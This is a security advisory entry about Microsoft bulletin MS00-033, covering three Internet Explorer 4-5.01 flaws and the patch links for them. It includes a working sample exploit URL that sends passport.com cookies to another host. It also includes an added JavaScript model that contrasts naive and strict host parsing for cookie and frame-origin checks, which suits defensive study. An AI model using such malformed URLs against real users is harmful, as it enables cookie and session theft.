
MSIE Frame Domain Verification, Unauthorized Cookie Access and Malformed Component Attribute
18th May 2000 [SBWID-1318]
COMMAND

	Frame Domain Verification,  Unauthorized  Cookie  Access  and  Malformed
	Component Attribute
	

	

SYSTEMS AFFECTED

	    Microsoft Internet Explorer 4.0, 4.01, 5.0 and 5.01

	

	

PROBLEM

	    The following is based on a Microsoft Security Bulletin (MS00-033).

	    The three security vulnerabilities eliminated by this patch are
	    unrelated to each other except that they all occur in the same
	    .dll. We have packaged them together for customer convenience.
	    The vulnerabilities are:

	

	    - "Frame Domain Verification" vulnerability. When a web server
	      opens a frame within a window, the IE security model should
	      only allow the parent window to access the data in the frame
	      if they are in the same domain. However, two functions
	      available in IE do not properly perform domain checking, with
	      the result that the parent window could open a frame that
	      contains a file on the local computer, then read it. This could
	      allow a malicious web site operator to view files on the
	      computer of a visiting user. The web site operator would need
	      to know (or guess) the name and location of the file, and could
	      only view file types that can be opened in a browser window.
	      This was reported by Mead & Company's Andrew Nosenko.

	

	    - "Unauthorized Cookie Access" vulnerability. By design, the IE
	      security model restricts cookies so that they can be read only
	      by sites within the originator's domain. However, by using a
	      specially malformed URL, it is possible for a malicious web
	      site operator to gain access to another site's cookies and read,
	      add or change them. A malicious web site operator would need
	      to entice a visiting user into clicking a link in order to
	      access each cookie, and could not obtain a listing of the
	      cookies available on the visitor's system. Even after
	      recovering a cookie, the type and amount of personal information
	      would depend on the privacy practices followed by the site that
	      placed it there. This was reported by Marc Slemko.

	

	 Update

	 ======

	 

	Sample exploit:

	 http://passport.com%20.sub.znep.com/cgi-bin/cookies

	...will cause IE to connect to the hostname specified, but send that
	server the cookies belonging to the hostname before the "%20", in this
	case passport.com. "%20" is the URL-encoded form of a space character.
	It isn't the only character that works; a variety of others are also
	misparsed.

	Secure cookies, however, do not seem to be vulnerable.

	 ======

	More details at: http://alive.znep.com/~marcs/security/iecookie2/
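	The following is an added example, not code from the advisory, from
	Microsoft or from Marc Slemko. It models the two checks described above
	in one runnable script: the cookie-domain decision for a request URL
	(the "Unauthorized Cookie Access" misparse just shown, as a parser
	differential between a naive host parser and a strict one) and the
	same-origin decision a browser must make before letting a parent window
	read a frame ("Frame Domain Verification"). The znep.com URL is the one
	quoted in the advisory; evil.example, a.example, the local file path,
	the cookie value and the "%09" (tab) variant are constructed for the
	example, the last one only to illustrate the advisory's remark that
	other characters are misparsed too.

```javascript
// Added example, not code from the advisory, from Microsoft or from Marc
// Slemko. It models the two checks the advisory describes:
//   1. the cookie-domain decision for a request URL (Unauthorized Cookie
//      Access), as a parser differential between a naive host parser and a
//      strict one;
//   2. the same-origin decision a browser must make before letting a parent
//      window read a frame (Frame Domain Verification).
// The znep.com URL is the one quoted in the advisory; every other hostname,
// path and cookie value below is constructed for the example.

const HTTP_URL_RE = /^(https?):\/\/([^/?#]*)([/?#].*)?$/i;

// naiveParse reproduces the behaviour the advisory attributes to unpatched IE:
// the network layer connects to the raw host, while the cookie layer
// percent-decodes it and stops at the first whitespace character. One URL
// therefore yields two different hosts.
function naiveParse(url) {
  const m = HTTP_URL_RE.exec(url);
  if (!m) throw new Error("not an http(s) URL: " + url);
  const raw = m[2];
  return {
    scheme: m[1].toLowerCase(),
    connectHost: raw.toLowerCase(),
    cookieHost: decodeURIComponent(raw).split(/\s/)[0].toLowerCase(),
    path: m[3] || "/",
  };
}

// A host is a dot-separated sequence of DNS labels, nothing else. Validation
// runs on the raw text, so a "%" (or any other escape) is rejected outright
// rather than decoded; a URL can then only ever name one host.
const DNS_HOST_RE =
  /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/;

function strictParse(url) {
  const m = HTTP_URL_RE.exec(url);
  if (!m) throw new Error("not an http(s) URL: " + url);
  const host = m[2].toLowerCase();
  if (!DNS_HOST_RE.test(host)) {
    throw new Error("rejected host: " + JSON.stringify(host));
  }
  return { scheme: m[1].toLowerCase(), connectHost: host, cookieHost: host, path: m[3] || "/" };
}

// Constructed cookie jar: cookie domain -> cookies. A cookie is attached when
// the request host equals its domain or is a subdomain of it.
const JAR = { "passport.com": ["session=abc123"] };

function cookiesFor(jar, host) {
  const out = [];
  for (const [domain, cookies] of Object.entries(jar)) {
    if (host === domain || host.endsWith("." + domain)) out.push(...cookies);
  }
  return out;
}

// Which server receives which cookies, under a given parser.
function simulateRequest(parse, jar, url) {
  const p = parse(url);
  return { connectTo: p.connectHost, cookies: cookiesFor(jar, p.cookieHost) };
}

// Origin for the frame check is (scheme, host). A file: URL has no host; it
// gets the bare "file:" origin, which never equals an http(s) origin, so a
// remote page may not read a frame that shows a local file.
function originOf(url) {
  if (/^file:/i.test(url)) return "file:";
  const p = strictParse(url);
  return p.scheme + "://" + p.connectHost;
}

function parentMayReadFrame(parentUrl, frameUrl) {
  return originOf(parentUrl) === originOf(frameUrl);
}

// The advisory's sample URL under both parsers: the naive one connects to the
// znep.com host yet attaches passport.com's cookies; the strict one refuses.
const SAMPLE = "http://passport.com%20.sub.znep.com/cgi-bin/cookies";

function demo() {
  const leaked = simulateRequest(naiveParse, JAR, SAMPLE);
  let hardened;
  try {
    hardened = simulateRequest(strictParse, JAR, SAMPLE);
  } catch (e) {
    hardened = { rejected: e.message };
  }
  return { leaked, hardened };
}

console.log(JSON.stringify(demo(), null, 2));
```

	The design point is that the host used for the connection and the host
	used for the cookie (or origin) decision must be the same string, taken
	from a single validating parse; any code path that decodes or truncates
	the host on its own reintroduces the differential. A current WHATWG URL
	parser (browser or Node `new URL()`) rejects the sample URL outright,
	since a space is a forbidden host code point.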
	

	

	

	    - "Malformed Component Attribute" vulnerability. The code used to
	      invoke ActiveX components in IE has an unchecked buffer and
	      could be exploited by a malicious web site operator to run code
	      on the computer of a visiting user. The unchecked buffer is
	      only exposed when certain attributes are specified in
	      conjunction with each other. This was reported by UNYUN of the
	      Shadow Penguin Security Research Group of Japan.

	

	

SOLUTION

	    Patch availability:

	
	   http://www.microsoft.com/windows/ie/download/critical/patch6.htm

	   http://www.microsoft.com/technet/security/bulletin/ms01-055.asp 

	   http://www.microsoft.com/windows/ie/downloads/critical/q312461/default.asp  

	

	    The patches require IE 4.01 Service Pack 2 or IE 5.01 to install.
	    Customers using versions prior to these may receive a message
	    reading "This update does not need to be installed on this
	    system". This message is incorrect. More information is
	    available in KB article Q262509.

	    The patch also eliminates a new variant of the previously
	    addressed WPAD Spoofing vulnerability.

	
